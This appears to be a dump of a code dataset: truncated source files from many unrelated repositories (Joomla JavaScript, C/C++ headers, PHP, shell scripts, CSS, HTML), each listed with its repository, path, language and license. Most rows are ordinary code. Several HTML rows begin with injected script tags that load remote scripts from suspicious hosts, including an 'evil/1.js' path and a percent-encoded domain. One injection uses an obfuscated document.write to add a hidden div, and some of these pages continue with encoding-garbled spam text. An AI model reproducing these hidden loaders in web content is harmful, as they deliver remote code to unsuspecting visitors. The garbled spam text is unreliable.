code
stringlengths
3
1.05M
repo_name
stringlengths
4
116
path
stringlengths
3
942
language
stringclasses
30 values
license
stringclasses
15 values
size
int32
3
1.05M
var FabrikModalRepeat = new Class({ initialize: function (el, names, field) { this.names = names; this.field = field; this.content = false; this.setup = false; this.elid = el; this.win = {}; this.el = {}; this.field = {}; // If the parent field is inserted via js then we delay the loading untill ...
emundus/v5
administrator/components/com_fabrik/models/fields/fabrikmodalrepeat.js
JavaScript
gpl-2.0
7,061
/* * property-container.h * Copyright (C) 2010-2018 Belledonne Communications SARL * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option)...
raj-bhatia/grooveip-ios-public
submodules/linphone/src/object/property-container.h
C
gpl-2.0
1,573
/* * Copyright (C) 2015 TinyCore <http://www.tinycore.net/> * Copyright (C) 2014 TrinityCore<http://trinitycore.org/> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of ...
AwkwardDev/TinyCore
src/server/game/Entities/Player/SocialMgr.h
C
gpl-2.0
4,961
/* SPDX-License-Identifier: GPL-2.0-only */ #include <device/device.h> #include <device/pci.h> #include <fsp/api.h> #include <fsp/util.h> #include <intelblocks/acpi.h> #include <intelblocks/cfg.h> #include <intelblocks/gpio.h> #include <intelblocks/itss.h> #include <intelblocks/pcie_rp.h> #include <intelblocks/xdci.h>...
felixsinger/coreboot
src/soc/intel/elkhartlake/chip.c
C
gpl-2.0
4,410
<?php function _appthemes_localize_scripts() { // jQuery Validate wp_register_script( 'validate-lang', APP_FRAMEWORK_URI . '/js/validate/jquery.validate-lang.js', array( 'validate' ) ); wp_localize_script( 'validate-lang', 'validateL10n', array( 'required' => __( 'This field is required.', APP_TD ), 'remote'...
dakshatechnologies/renovize
wp-content/themes/renovizenew/framework/js/localization.php
PHP
gpl-2.0
2,069
<!-- Created by Jernej Jerin on 1.11.2014.--> <!-- Navigation--> <nav role="navigation" class="navbar navbar-inverse navbar-fixed-top"> <div class="container"> <!-- Brand and toggle get grouped for better mobile display--> <div class="navbar-header"></div> <button type="button" data-toggle="collapse" dat...
JernejJerin/sokoban-multiplayer
public/views/includes/header.html
HTML
gpl-2.0
936
package com.swayam.jmh.algos; import java.util.concurrent.TimeUnit; import org.openjdk.jmh.annotations.Benchmark; import org.openjdk.jmh.annotations.BenchmarkMode; import org.openjdk.jmh.annotations.Mode; import org.openjdk.jmh.annotations.OutputTimeUnit; import com.swayam.practice.algos.strings.IntegerArrayMatcher;...
paawak/blog
code/algos-jmh/src/main/java/com/swayam/jmh/algos/IntegerArrayMatcherSimpleStringImplBenchmark.java
Java
gpl-2.0
1,581
/* FTP file system Copyright (C) 2006 Robson Braga Araujo <robsonbraga@gmail.com> This program can be distributed under the terms of the GNU GPL. See the file COPYING. */ #include <stdlib.h> /* realloc(), exit() */ #include <string.h> /* memcpy() */ #include <stdio.h> /* stderr, fprintf() */ #includ...
vpit/curlftpfs
buffer.c
C
gpl-2.0
1,251
//---------------------------------------------------------------------------------------- // // This file and all other Easy Bridge source files are copyright (C) 2002 by Steven Han. // Use of this file is governed by the GNU General Public License. // See the files COPYING and COPYRIGHT for details. // //------------...
azureskydiver/EasyBridge
Source/Wizards/BidOptsMiscPage.h
C
gpl-2.0
1,621
/* * Copyright (c) 2007 Henrique Pinto <henrique.pinto@kdemail.net> * Copyright (c) 2008-2009 Harald Hvaal <haraldhv@stud.ntnu.no> * Copyright (c) 2010 Raphael Kubo da Costa <rakuco@FreeBSD.org> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the ...
mvlabat/ark
plugins/libarchive/readonlylibarchiveplugin.cpp
C++
gpl-2.0
1,989
<?php $atts = array_map('contact_do_shortcode', (array) $atts); extract(shortcode_atts(array('filter' => ''), $atts)); $form_id = $GLOBALS['contact_form_id']; $prefix = $GLOBALS['contact_form_prefix']; $content = explode('[other]', do_shortcode($content)); if (!isset($_POST[$prefix.'submit'])) { $n = 2; } elseif ...
patricerandria/ccmgr-wp
ccmgr/wp-content/plugins/contact-manager/includes/forms/validation-content.php
PHP
gpl-2.0
526
<?php use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class AddShortnameProjects extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::table('projects', function(Blueprint $table) { // $table->string('sho...
elconejito/Graphics-Library
app/database/migrations/2014_03_17_173453_add_shortname_projects.php
PHP
gpl-2.0
547
cmd_lib/zlib_deflate/deflate.o := arm-linux-gnueabi-gcc -Wp,-MD,lib/zlib_deflate/.deflate.o.d -nostdinc -isystem /usr/lib/gcc-cross/arm-linux-gnueabi/4.7/include -Iinclude -I/home/benoit/kernel_android/32/es209ra/arch/arm/include -include include/linux/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-msm/inclu...
b8e5n/KTG-kernel_es209ra
lib/zlib_deflate/.deflate.o.cmd
Batchfile
gpl-2.0
14,595
#/bin/bash echo "Building help..." basedir=$(pwd) cd promet/help rm -r $BUILD_DIR mkdir $BUILD_DIR cp help.db $BUILD_DIR $SQLITE3 $BUILD_DIR/help.db "delete from DOCUMENTS where TYPE<>'W';delete from HISTORY;delete from REPORTS;delete from ACCHISTORY;delete from TEMPLATES;delete from DOCPAGES;delete from DELETEDITEMS;d...
cutec-chris/promet-erp
promet/help/build.sh
Shell
gpl-2.0
753
/* * (C) 2000-2006 by the netfilter coreteam <coreteam@netfilter.org>: * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later ve...
alessandrod/cattivo
cattivo/firewall/iptables/xtables/xtables.c
C
gpl-2.0
36,930
<?php //$Id$ /** * CLAROLINE * @version 1.9 $Revision$ * * @copyright (c) 2001-2007 Universite catholique de Louvain (UCL) * * @license http://www.gnu.org/copyleft/gpl.html (GPL) GENERAL PUBLIC LICENSE * * @package ADMIN * * @author Guillaume Lederer <lederer@claroline.net> */ $cidReset = TRUE; $gidReset = T...
yannhos115/claroline-exercice
claroline/admin/adminusers.php
PHP
gpl-2.0
18,212
/***************/ /* GENERAL CSS */ /***************/ #body_bg { border-bottom: 1px solid #222; } #body_left { background: transparent url(../images/all/fill_left.png) 0 0 repeat-y; } #body_right { background: transparent url(../images/all/fill_right.png) 100% 0 repeat-y; } ul.links li { border-left: 1px solid #2...
danlauby/bookstore
sites/all/themes/black_hole/css/star.css
CSS
gpl-2.0
5,399
/***************************************************************************** * ____ ____ _ _ _ * * /# /_\_ | _ \ (_) __| | (_) ___ _ __ * * | |/o\o\ | | | | | | / _` | | | / _ \ | '__| * * ...
ac001/ffs-central
win_messages.h
C
gpl-2.0
2,671
# # Check for struct packing features # This feature reworked from m4/reorganization/code_checks/compiler_attribs.m4 # GET_FILENAME_COMPONENT(_selfdir_CheckFTS "${CMAKE_CURRENT_LIST_FILE}" PATH) # Check if __attribute__((packed)) is available check_c_source_compiles( " #include <fts.h> int main(void)...
gbmaster/clamav-devel
cmake/CheckFTS.cmake
CMake
gpl-2.0
434
// // Copyright 2002 Sony Corporation // // Permission to use, copy, modify, and redistribute this software for // non-commercial use is hereby granted. // // This software is provided "as is" without warranty of any kind, // either expressed or implied, including but not limited to the // implied warranties of fitnes...
EiichiroIto/scratch-aibo
MotionAgents/MoNetAgentManager.cc
C++
gpl-2.0
5,877
<?php /* Plugin Name: Калькулятор цен Plugin URI: none Description: Плагин загрузки цен на услуги СТО для калькулятора цен на сайте Автодоктор Version: 3.1.5 Author: WebUniverse Author URI: http://webuniverse.com.ua/ */ define( 'prices_calculator_PLUGIN_URL', plugin_dir_url( __FILE__ ) ); define( 'prices_calc...
PapaPsih/Avtodoctor
wp-content/plugins/prices_calculator/prices_calculator.php
PHP
gpl-2.0
6,459
import testlib.flowexpression.qual.FlowExp; public class Canonicalization { class LockExample { protected final Object myLock = new Object(); protected @FlowExp("myLock") Object locked; protected @FlowExp("this.myLock") Object locked2; public @FlowExp("myLock") Object getLocked() ...
CharlesZ-Chen/checker-framework
framework/tests/flowexpression/Canonicalization.java
Java
gpl-2.0
1,226
/* packet-bthci-cmd.c * Routines for the Bluetooth HCI Command dissection * Copyright 2002, Christoph Scholz <scholz@cs.uni-bonn.de> * From: http://affix.sourceforge.net/archive/ethereal_affix-3.patch * * Refactored for wireshark checkin * Ronnie Sahlberg 2006 * * Updated to HCI specification 2.1 + EDR * ...
weizhenwei/wireshark
epan/dissectors/packet-bthci_cmd.c
C
gpl-2.0
279,027
/****************************************************************************** * * Metodología de la Programación * Grado en Ingeniería Informática * * 2014 - Ernesto Serrano Collado * ------------------------------ * * Supongamos que para definir matrices bidimensionales dinamicas usamos una * est...
erseco/ugr_metodologia_programacion
Practica_5/src/ejercicio8.cpp
C++
gpl-2.0
4,558
/* * PMC-Sierra SPC 8001 SAS/SATA based host adapters driver * * Copyright (c) 2008-2009 USI Co., Ltd. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source cod...
cneira/ebpf-backports
linux-3.10.0-514.21.1.el7.x86_64/drivers/scsi/pm8001/pm8001_hwi.c
C
gpl-2.0
166,217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible"content="IE=9; IE=8; IE=7; IE=EDGE"> <meta http-equiv="Content-Type...
ForAEdesWeb/AEW25
logs/po/q44786.html
HTML
gpl-2.0
17,819
<CTYPE html> <html> <head> <script type="text/javascript" src="d3.v3.min.js"></script> </head> <body> <script type="text/javascript"> var wide = 800; var high = 600; var timeStep =40000000; // microseconds in a minute var svg = d3.select("body").append("svg:svg") .attr("width", wide) ....
nvbhat/visual-search
sample.html
HTML
gpl-2.0
2,753
# -*- coding: utf-8 -*- # from django.contrib.staticfiles.templatetags.staticfiles import static from django.conf import settings from django.utils.translation import gettext_lazy as _ def jumpserver_processor(request): # Setting default pk context = { 'DEFAULT_PK': '00000000-0000-0000-0000-0000000000...
eli261/jumpserver
apps/jumpserver/context_processor.py
Python
gpl-2.0
835
<?php /** * Copyright (C) 2011-2015 Visman (mio.visman@yandex.ru) * License: http://www.gnu.org/licenses/gpl.html GPL version 2 or higher */ if (!defined('PUN')) exit; if (isset($pun_config['o_fbox_files']) && !isset($http_status) && (!$pun_user['is_guest'] || !empty($pun_config['o_fbox_guest']))) { if (strpos(...
MioVisman/FluxBB_by_Visman
include/fancybox.php
PHP
gpl-2.0
1,028
cmd_drivers/input/built-in.o := ld -m elf_i386 -r -o drivers/input/built-in.o drivers/input/input-core.o drivers/input/mousedev.o drivers/input/evdev.o drivers/input/keyboard/built-in.o drivers/input/mouse/built-in.o
namgk/kernel-tut
drivers/input/.built-in.o.cmd
Batchfile
gpl-2.0
221
using System; using System.Collections.Generic; using System.Linq; using System.Text; using Microsoft.Xna.Framework; using AnimationExample; namespace ProjectSneakyGame { /// <summary> /// Extension of the DrawableGameComponent class. /// Includes set-up and functions for 3D matrix movement of DrawableGam...
JoshuaKlaser/ANSKLibrary
AnimationExample/AnimationExample/DrawableMovableComponent.cs
C#
gpl-2.0
7,452
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title>KMessageWidget</title> <meta http-equiv="Content-Type" content="text/htm...
KDE/pykde4
docs/html/kdeui/KMessageWidget.html
HTML
gpl-2.0
20,784
<?php /** * Sources English lexicon topic * * @language en * @package modx * @subpackage lexicon */ $_lang['access'] = 'Åtkomsträttigheter'; $_lang['base_path'] = 'Bassökväg'; $_lang['base_path_relative'] = 'Relativ bassökväg?'; $_lang['base_url'] = 'Bas-URL'; $_lang['base_url_relative'] = 'Relativ bas-URL?'; $_l...
svyatoslavteterin/belton.by
core/lexicon/sv/source.inc.php
PHP
gpl-2.0
5,705
# mandelbrotMPIVersion A parallel computing version for drawing Mandelbrot Set. Using OpenGL-GLUT and OpenMPI.
windmgc/mandelbrotMPIVersion
README.md
Markdown
gpl-2.0
111
#!/bin/sh exitnode=0 # Exit Code function finish { echo "[acs] Stopping Automatic Cinema Server" exitnode=1 } trap finish 2 3 8 15 # startup mongo & node while (( $exitnode == 0 )) do ./AutomaticCinemaServer done
urshofer/automatic-cinema-server
start.sh
Shell
gpl-2.0
220
/* * Copyright (C) 2008-2011 TrinityCore <http://www.trinitycore.org/> * Copyright (C) 2006-2009 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software ...
SeTM/MythCore
src/server/scripts/Outland/blades_edge_mountains.cpp
C++
gpl-2.0
16,406
package geeksforgeeks.divide.conquer; /* * http://chuansongme.com/n/122759 * * This is actually dutch national flag problem. See SortList.java. * * Check the above link for another solution */ public class Sort123 { }
sindhujapr/ms_prep
companies/geeksforgeeks/divide/conquer/Sort123.java
Java
gpl-2.0
227
/* * Copyright (C) 2011-2021 Project SkyFire <https://www.projectskyfire.org/> * Copyright (C) 2008-2021 TrinityCore <http://www.trinitycore.org/> * Copyright (C) 2005-2021 MaNGOS <https://www.getmangos.eu/> * Copyright (C) 2006-2014 ScriptDev2 <https://github.com/scriptdev2/scriptdev2/> * * This program is free ...
ProjectSkyfire/SkyFire.548
src/server/scripts/Kalimdor/RazorfenKraul/instance_razorfen_kraul.cpp
C++
gpl-2.0
3,367
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>List of All Members for QtopiaTimer</title> <link href="classic.css" rel="stylesheet" type="text/css" />...
muromec/qtopia-ezx
doc/html/qtopiatimer-members.html
HTML
gpl-2.0
7,300
/* This file is part of the program psim. Copyright (C) 1994-1997, Andrew Cagney <cagney@highland.com.au> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the Lic...
palves/gdb-old-releases
sim/common/hw-tree.h
C
gpl-2.0
2,625
/* vim:set sts=4 ts=4 noexpandtab: */ /* * This confidential and proprietary software may be used only as * authorised by a licensing agreement from ARM Limited * (C) COPYRIGHT 2009 ARM Limited * ALL RIGHTS RESERVED * The entire notice above must be reproduced on all authorised * copies and copies may only be mad...
giannoug/android_device_jxd_s7300b
packages/PictureKit/jni/libampickit/pic_core/vo/gles/linux_runtime.h
C
gpl-2.0
554
/** * @author Stefan Brandle * @author Jonathan Geisler * @date September, 2014 * */ #ifndef PLAYERV2_CPP // Double inclusion protection #define PLAYERV2_CPP #include <iostream> #include "PlayerV2.h" /** * @brief Constructor: initializes any game-long data structures. * * The player should reinitialize any...
BoringCode/BattleshipAI
PlayerV2.cpp
C++
gpl-2.0
658
<?php /* *--------------------------------------------------------- * * CartET - Open Source Shopping Cart Software * http://www.cartet.org * *--------------------------------------------------------- */ define('MODULE_PAYMENT_PLATON_TEXT_TITLE', 'Platon.ua'); define('MODULE_PAYMENT_PLATON_TEXT_DESCRIPTION', 'Platon: ...
OSC-CMS/Shopping-Cart
modules/payment/platon/ru.php
PHP
gpl-2.0
1,645
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0...
ForAEdesWeb/AEW2
images/Core2Duo/020411358y86yp.html
HTML
gpl-2.0
43,148
# whyubuntuisbetter ##How to edit content: This is the file you need to edit: https://github.com/mariogrip/whyubuntuisbetter/blob/master/items.json Let's say the items.json file looks like this: ``` { "items": [ { "title": "Example", "text": "This is an awesome example." } ] } ``` And you...
mariogrip/whyubuntuisbetter
README.md
Markdown
gpl-2.0
1,994
/* packet-ssl-utils.h * ssl manipulation functions * By Paolo Abeni <paolo.abeni@email.com> * * Wireshark - Network traffic analyzer * By Gerald Combs <gerald@wireshark.org> * Copyright 1998 Gerald Combs * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU Ge...
zonque/wireshark
epan/dissectors/packet-ssl-utils.h
C
gpl-2.0
67,801
local combat = Combat() combat:setParameter(COMBAT_PARAM_TYPE, COMBAT_EARTHDAMAGE) combat:setParameter(COMBAT_PARAM_EFFECT, CONST_ME_SMALLPLANTS) combat:setArea(createCombatArea(AREA_SQUAREWAVE5, AREADIAGONAL_SQUAREWAVE5)) combat:setParameter(COMBAT_PARAM_PVPDAMAGE, 250) function onGetFormulaValues(player, level, magl...
Caduceus/DecapitatedSoul
data/spells/scripts/attack/terra wave.lua
Lua
gpl-2.0
601
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×...
ForAEdesWeb/AEW25
logs/site-nipponki/02021649424.html
HTML
gpl-2.0
81,174
// La generación de código T4 está habilitada para el modelo 'C:\Proyectos SVN\PRESTLAN\Models\PrestlanModel.edmx'. // Para habilitar la generación de código heredada, cambie el valor de la propiedad del diseñador 'Estrategia de generación de código' // por 'ObjectContext heredado'. Esta propiedad está disponible en ...
alfre/Prestlan
Models/PrestlanModel.Designer.cs
C#
gpl-2.0
914
<?php // No direct access defined('_JEXEC') or die; jimport('joomla.application.component.view'); class PropertyViewAgent extends JView { protected $form; protected $item; protected $state; public function display($tpl = null) { // Initialiase variables. $this->form = $this->get('Fo...
djoudi/cambodian-property-today
administrator/components/com_property/views/agent/view.html.php
PHP
gpl-2.0
2,164
package com.savanto.correspondencechess; import android.content.Context; import android.view.MotionEvent; import android.view.View; import android.widget.RelativeLayout; /** * Extension of the View class to allow easy creation and manipulation * of views containing chess pieces. */ public class PieceView extends V...
savanto/CorrespondenceChess-Android
src/com/savanto/correspondencechess/PieceView.java
Java
gpl-2.0
3,118
CREATE TABLE IF NOT EXISTS `#__item_costs` ( `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, `ordering` INT(11) NOT NULL , `state` TINYINT(1) NOT NULL DEFAULT '1', `checked_out` INT(11) NOT NULL , `checked_out_time` DATETIME NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` INT(11) NOT NULL , `code` VARCHAR(25) ...
adster101/French-Connections-
administrator/components/com_itemcosts/sql/install.mysql.utf8.sql
SQL
gpl-2.0
473
/** * */ package fr.hervedarritchon.soe.soebackend.exception; /** * @author Hervé Darritchon (@hervDarritchon) * */ public class CannotCreateUserException extends Exception { public CannotCreateUserException(final String message) { super(message); } /** * */ private static final long serialVersionUID ...
herveDarritchon/soebackend
src/main/java/fr/hervedarritchon/soe/soebackend/exception/CannotCreateUserException.java
Java
gpl-2.0
349
#include "skewnessfeature.h" using Romeo::Model::Core::Feature::SkewnessFeature; using Romeo::Model::Core::Feature::StandardDeviationFeature; using Romeo::Model::Core::Feature::FirstOrderFeature; using Romeo::Model::Core::InternalData; using Romeo::Model::Core::InternalData2D; using Romeo::Model::Core::InternalData3D;...
NicolaMagnabosco/Romeo
RomeoCode/model/core/feature/skewnessfeature.cpp
C++
gpl-2.0
4,479
#include <iostream> #include <ctime> #include <QString> #include <QInputDialog> #include "mainwindow.h" #include "ui_mainwindow.h" #include "solution.hpp" MainWindow::MainWindow(QWidget* parent) : QMainWindow(parent), ui(new Ui::MainWindow) { ui->setupUi(this); results = new ResultsModel(); ui...
trombipeti/qbtimer
mainwindow.cpp
C++
gpl-2.0
1,568
#include <linux/module.h> #include <linux/reboot.h> #include <linux/spinlock.h> #include <linux/interrupt.h> #include <linux/moduleparam.h> #include <linux/errno.h> #include <linux/types.h> #include <linux/delay.h> #include <linux/pci.h> #include <linux/time.h> #include <linux/mutex.h> #include <linux/smp_lock.h> #in...
luckasfb/OT_903D-kernel-2.6.35.7
kernel/drivers/scsi/3w-9xxx.c
C
gpl-2.0
74,008
package com.aifeng.ws.wx; import java.util.Map; /** * Created by pro on 17-4-17. */ public class RequestBody { private String touser; private String msgtype; private int agentid; private Map<String,Object> text; private int safe; public String getTouser() { return touser; }...
dunyuling/cxh
src/main/java/com/aifeng/ws/wx/RequestBody.java
Java
gpl-2.0
974
/* * This is the source code of Telegram for Android v. 5.x.x. * It is licensed under GNU GPL v. 2 or later. * You should have received a copy of the license in this archive (see LICENSE). * * Copyright Nikolai Kudashov, 2013-2018. */ package org.telegram.ui.Cells; import android.content.Context; import android...
CzBiX/Telegram
TMessagesProj/src/main/java/org/telegram/ui/Cells/NotificationsCheckCell.java
Java
gpl-2.0
7,049
<?php if (cfr('BACKUP')) { set_time_limit(0); $alterConf = $ubillingConfig->getAlter(); if (!wf_CheckGet(array('restore'))) { if (isset($_POST['createbackup'])) { if (isset($_POST['imready'])) { if (!empty($alterConf['MYSQLDUMP_PATH'])) { //run syste...
pautiina/Ubilling
modules/general/backups/index.php
PHP
gpl-2.0
9,024
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_51) on Mon Jul 21 11:18:42 EEST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Interface ...
danielvdwal/AVS_ParkingLot
Hazelcast/javadoc/com/hazelcast/spi/class-use/MembershipAwareService.html
HTML
gpl-2.0
6,311
jQuery(document).ready( function($) { $('#bp-forum-notifier-toggle-subscription').live('click', function(e) { e.preventDefault(); var subscribe_or_unsubscribe = $(this).data('action'); var nonce = $(this).data('nonce'); var group_id = $(this).data('group_id'); $.ajax({ type: "POST", url: ajaxurl, d...
klandestino/bp-forum-notifier
js/bp-forum-notifier.js
JavaScript
gpl-2.0
821
// Copyright 2015 Dolphin Emulator Project // Licensed under GPLv2+ // Refer to the license.txt file included. #include "VideoCommon/VertexLoaderARM64.h" #include "Common/CommonTypes.h" #include "VideoCommon/DataReader.h" #include "VideoCommon/VertexLoaderManager.h" using namespace Arm64Gen; constexpr ARM64Reg src_r...
Ebola16/dolphin
Source/Core/VideoCommon/VertexLoaderARM64.cpp
C++
gpl-2.0
20,467
#include "common.h" #include "datacache.h" int datacache_add(datacache **dc, const char *interface, const short sync) { datacache *newdc; newdc = malloc(sizeof(datacache)); if (newdc == NULL) { return 0; } newdc->next = *dc; *dc = newdc; strncpy_nt((*dc)->interface, interface, 32); (*dc)->active = 1; (*dc...
vergoh/vnstat
src/datacache.c
C
gpl-2.0
3,189
<?php /** * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; under version 2 * of the License (non-upgradable). * * This program is distributed in the hope that it will be useful, * but WIT...
oat-sa/extension-tao-testqti
scripts/install/HideQtiAdaptiveSectionIds.php
PHP
gpl-2.0
1,644
<?php /** * * Template for the shopping cart * * @package VirtueMart * @subpackage Cart * @author Max Milbers * * @link http://www.virtuemart.net * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php * VirtueMart...
kenbabu/emproj
components/com_virtuemart/views/cart/tmpl/order_done.php
PHP
gpl-2.0
699
/* * GPL LICENSE SUMMARY * * Started by Venkat Jayaraman <venkat.jayaraman@intel.com>, Copyright(c) 2016 Intel Corporation. * * This program is free software; you can redistribute it and/or modify * it under the terms of either version 2 or any later version of the GNU General Public License as * published by th...
intel-aero/meta-intel-aero-base
recipes-support/aero-watchdog/aero-watchdog/aero-watchdog.c
C
gpl-2.0
1,680
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>QMailViewerPlugin Class Reference</title> <link href="classic.css" rel="stylesheet" type="text/css" /> <...
muromec/qtopia-ezx
doc/html/qmailviewerplugin.html
HTML
gpl-2.0
4,723
mn_scythe_sprinkler_swipe_sprinkler = 0
PAPAGENO-devels/papageno
test/benchmarks/Lua/lua-regression-test/grim/mn_scythe_sprinkler.lua
Lua
gpl-2.0
40
//stlÌṩÁËÁ½ÖÖÈÝÆ÷£ºÐòÁУ¨vector¡¢list¡¢deque£©ºÍ¹ØÁªÈÝÆ÷£¨map¡¢mutilmap¡¢set¡¢mutilset£© //¶ø stackºÍqueueÊÇ×÷Ϊ»ù±¾ÈÝÆ÷µÄÊÊÅäÆ÷¡£ ////-----------------------------------Ðò ÁÐ-------------------------------- ////-----------------------------------ÊÊÅäÆ÷-------------------------------- //ÊÊÅäÆ÷ÌṩµÄÊÂÔ­À´ÈÝÆ÷µÄÒ»¸ö...
lizhenghn123/CppLanguagePrograms
STL/stackDemo/stackDemo.cpp
C++
gpl-2.0
3,385
package io.github.yannici.bedwars.Game; import io.github.yannici.bedwars.Main; import io.github.yannici.bedwars.Utils; import io.github.yannici.bedwars.Events.BedwarsOpenTeamSelectionEvent; import java.util.ArrayList; import java.util.Collection; import java.util.HashMap; import java.util.List; import org.bukkit.Buk...
homedog21/bedwars-reloaded
src/io/github/yannici/bedwars/Game/PlayerStorage.java
Java
gpl-2.0
9,378
// // UIImage+DiskImageIcon.h // Mini vMac // // Created by Jesús A. Álvarez on 21/05/2016. // Copyright © 2016-2018 namedfork. All rights reserved. // #import <UIKit/UIKit.h> extern NSString *DidUpdateIconForDiskImageNotification; @interface UIImage (DiskImageIcon) + (UIImage *)imageWithIconForDiskImage:(NSStr...
zydeco/minivmac4ios
Mini vMac/UIImage+DiskImageIcon.h
C
gpl-2.0
341
/*****************************************************************************\ * slurm_protocol_api.c - high-level slurm communication functions ***************************************************************************** * Copyright (C) 2002-2007 The Regents of the University of California. * Copyright (C) 20...
corburn/slurm
src/common/slurm_protocol_api.c
C
gpl-2.0
110,409
body { padding: 0; margin: 0px; } a { text-decoration: none; } div.menubar { padding: 4px; text-align: right; }
pmfournier/netqual
htmlstatic/index.css
CSS
gpl-2.0
119
{{extend 'layout_score.html'}} <div class="grid"> {{=H3('Active Services')}} {{=active}} </div> <div class="grid"> {{=H3('Disabled services')}} {{=disabled}} </div>
ShySec/scrimmage-scoreboard
web2py/applications/scoreboard/views/services/index.html
HTML
gpl-2.0
171
<?php /* -------------------------------------------------------------- blacklist.php 2008-08-10 gambio Gambio OHG http://www.gambio.de Copyright (c) 2008 Gambio OHG Released under the GNU General Public License (Version 2) [http://www.gnu.org/licenses/gpl-2.0.html] --------------------------------...
pobbes/gambio
lang/german/admin/blacklist.php
PHP
gpl-2.0
1,844
markery_ryby={"403.7336730957,-2086.9340820313,7.8300905227661" , "396.11712646484,-2087.2326660156,7.8359375" , "368.95776367188,-2086.4436035156,7.8359375", "354.84902954102,-2087.970703125,7.8359375", "374.82989501953,-2086.5729980469,7.8359375", "391.11544799805,-2087.4682617188,7.8359375"} function Check(funcn...
Daniex0r/project-roleplay-rp
resources/prp_ryby/server.lua
Lua
gpl-2.0
3,539
<?php /** * com_simplecalendar - a simple calendar component for Joomla * Copyright (C) 2008-2009 Fabrizio Albonico * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either vers...
mchalupar/Union-Leopoldschlag
tmp/install_50dda12248b2d/component/views/calendar/view.html.php
PHP
gpl-2.0
4,869
/*global require,__dirname*/ var connect = require('connect'); connect.createServer( connect.static(__dirname) ).listen(8080);
kurthalex/BRGM-BdCavite-cesium
cesium/Build/server.js
JavaScript
gpl-2.0
127
/* * Copyright Johannes Sixt * This file is licensed under the GNU General Public License Version 2. * See the file COPYING in the toplevel directory of the source directory. */ #ifndef ENVVAR_H #define ENVVAR_H /* * Description of environment variables. Note that the name of the variable * is given as the key ...
iegor/kdesdk
kdbg/kdbg/envvar.h
C
gpl-2.0
559
class TreatmentAreas::PatientsController < ApplicationController before_filter :authenticate_user! before_filter :find_treatment_area def index @patients_table = PatientsTable.new @patient_search = @patients_table.search(params) end def radiology @patient = Patient.find(params[:id]) if dexi...
mission-of-mercy/georgia
app/controllers/treatment_areas/patients_controller.rb
Ruby
gpl-2.0
945
# replaces the '%' symbol with '+', leaving the return values of actions usable for other things, such as type information, # and leaving whitespace intact. from dparser import Parser # turn a tree of strings into a single string (slowly): def stringify(s): if not isinstance(s, str): return ''.join(map(st...
charlesDGY/coflo
coflo-0.0.4/third_party/d/python/tests/test6.py
Python
gpl-2.0
743
/* * GPL HEADER START * * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 only, * as published by the Free Software Foundation. * * This program is distributed...
walgenbach/lustre-release
lnet/klnds/socklnd/socklnd_lib-winnt.h
C
gpl-2.0
1,877
